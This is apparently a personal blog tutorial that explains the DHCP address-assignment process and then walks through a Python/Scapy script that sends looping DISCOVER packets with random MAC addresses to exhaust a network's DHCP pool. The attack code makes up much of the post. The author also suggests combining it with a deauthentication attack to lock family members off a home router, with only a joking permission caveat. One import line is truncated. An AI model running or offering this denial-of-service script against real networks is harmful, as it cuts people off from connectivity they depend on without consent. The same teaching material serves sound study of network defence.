Open in app

Sign in

Write

Sign in

DHCP Starvation Attack using Python

Kavishka Gihan
6 min readAug 13, 2021

--

In this article, I am going to talk about what a DHCP starvation attack is and how this attack can be done using Python.

If you have no knowledge on what DHCP is and the usage of this protocol I recommend reading the article below to get a basic understand of how all these work.

DHCP defined and how it works

The ability to network devices quickly and easily is critical in a hyper-connected world, and although it has been…

www.networkworld.com

Before we talk about how this attack is done, we have to have a thorough understanding about how IP assigning is done.

IP address allocation process

Whenever a new device is connected to a network, an IP address is automatically assigned.

Here you can see there are 4 packets are sent between the DHCP server and the client in this process. Let’s understand them one by one.

  1. DHCP-DISCOVER packet is sent by the client to the DHCP server. This is the first most packet of the conversation. This packet is responsible for asking an IP address from the DHCP server. This packet is broadcasted in the network. Then the DHCP server receives it and responses accordingly.
DISCOVER packet sent to DHCP servers

2. DHCP-OFFER packet is the packet that the DHCP server is responding for the DISCOVER packet. This packet is unicasted according to the source MAC of the DHCP-DISCOVER message. Depending on the availability of the IP address, the DHCP server returns a message either confirming or denying to provide an IP address.

3. DHCP-REQUEST packet is sent by the client only if the OFFER message was confirmed and not declined. If the client receives multiple offers it will accept the first one it gets, broadcasts the DHCP-REQUEST message to formally request the IP address.

DHCP server responded with the IP 192.168.1.3

4. DHCP-ACK or NAK is received by the client. DHCP-ACK confirming that an IP has been allocated to the client or DHCP-NAK denying the IP address allocation .Otherwise, the client sends a DHCP-DECLINE message to the server to request an IP address again.

After this process, the client is connected to the network and assigned an IP successfully.

What are we exploiting?

Now you might be thinking, what is there to exploit? This is just a simple process. Well yeah, it is. But here we are targeting the fact that the DHCP server assigns an IP to any host that requests one.

Imagine a scenario like this. You, the attacker connect to a network and you are automatically assigned an IP by the DHCP server of that network. Then you ask the DHCP server for another IP address by sending an arbitrary request changing the MAC address. Since the DHCP server doesn’t know that this MAC is not your real MAC, it will remove an IP from the pool and assign it for that MAC address.

“ If we send arbitrary packets, requesting IP addresses until all the addresses in the DHCP pool are allocated, no other clients will be able to connect to the network as there are no IP addresses available. This is what we call a DHCP Starvation attack.”

Don’t be a Script Kiddie

There are a lot of automated tools that will perform this attack with just one or two clicks. But as a good hacker, you should have a good understanding of what happens under the hood. So let’s see how we can build our own script to perform this attack.

For this, I am using the Scapy module in Python. You can get this source code from my GitHub.

GitHub - kavishkagihan/DHCP-Starvation-Attack: A simple Python script to do a DHCP Starvation…

A simple Python script to do a DHCP Starvation attack, including a full walkthrough For this you will need a…

github.com

from scapy.all import
conf.checkIPaddr = False

Firstly I am importing the scapy module. Then I am disabling the IP check in the default configuration of scapy. This will prevent any IP conflicts.

Ether(dst="ff:ff:ff:ff:ff:ff", src=RandMAC(), type=0x0800)

Secondly, I am building the a DISCOVER packet to send. The first layer of the packet is the Ethernet layer which is the bottom most layer. Here I have specified the destination address(dst) to the “ff:ff:ff:ff:ff:ff” as this should be a broadcasted. And to prevent the DHCP server knowing who the real sender is, I have set the source address(src) to be a random MAC with the RandMAC() function.

Note something special, I have set the type to be 0x800. You can see this is set in a real discover request as well.

Wrieshark capture of a DISCOVER packet

That is very important for this request to be a valid one.

IP(src="0.0.0.0", dst="255.255.255.255")
UDP(dport=67,sport=68)

Then I have added the IP layer with the source address of 0.0.0.0 and the destination address of 255.255.255.255. After I have added the UDP layer to specify which port that we want this packet to be sent to. Port 68 is the default port of the BOOTP server.

BOOTP(op=1, chaddr=RandMAC())
DHCP(options=[("message-type","discover"), ("end")])

After that, I have added the BOOTP header to specify the options for asking the subnet mask to use. Here also I have specified a random MAC. Moving forward, I added the last part of the packet which is the DHCP header. I have specified that this is a discover message in the options parameter.

sendp(DHCP_DISCOVER, iface="eth0",loop=1,verbose=1 )

Lastly, I am sending this packet in layer 2 (sendp()) inside a loop(loop=1) so that it will send multiple requests asking for addresses. Also I have specified the interface to be “eth0”.

Then you can run the script. Make sure to run it as root.

As you can see, loads of packets are being sent. We can capture these DISCOVER packets in Wireshark as well.

Let this script to run for 1–3 minutes. Then all the addresses of the DHCP pool should be assigned. Now if a client tries to connect to the network, he will not get an IP address meaning he will not be able to connect to the network.

In my case, my android device kept waiting to receive an IP address. But since the DHCP pool was already exhausted, it was not able to connect.

A life hack, beyond the topic

So now you have seen how powerful this attack can be and what kind of damage could be done to a network with it. But you can make this more interesting and fun.

In experience I know how annoying it is when someone is using all the bandwidth of your home router so you can’t do your online stuff. So what you can do this, you can run a deauthntication attack against the network excluding your device’s MAC address and then run this attack so that no one can connect back. (Don’t attack networks that you don’t have permission to)

This is a little trick that I used to do to keep my family members away from my router. :laughing:

In an upcoming article, I will demonstrate how you can leverage this to a man-in-the-middle attack so that you can capture all the traffic going around the network and maybe some credentials too.

“So that’s it for now folks, if you have any questions, make sure to leave them down in the comments or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😃

Python Scapy
Dos
Dhcp
Starvation Attack

--

--

Kavishka Gihan
Kavishka Gihan

Written by Kavishka Gihan

347 Followers
19 Following

Cyber Security Student | Machine author @hackthebox | find me on instagram @_kavi.gihan

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams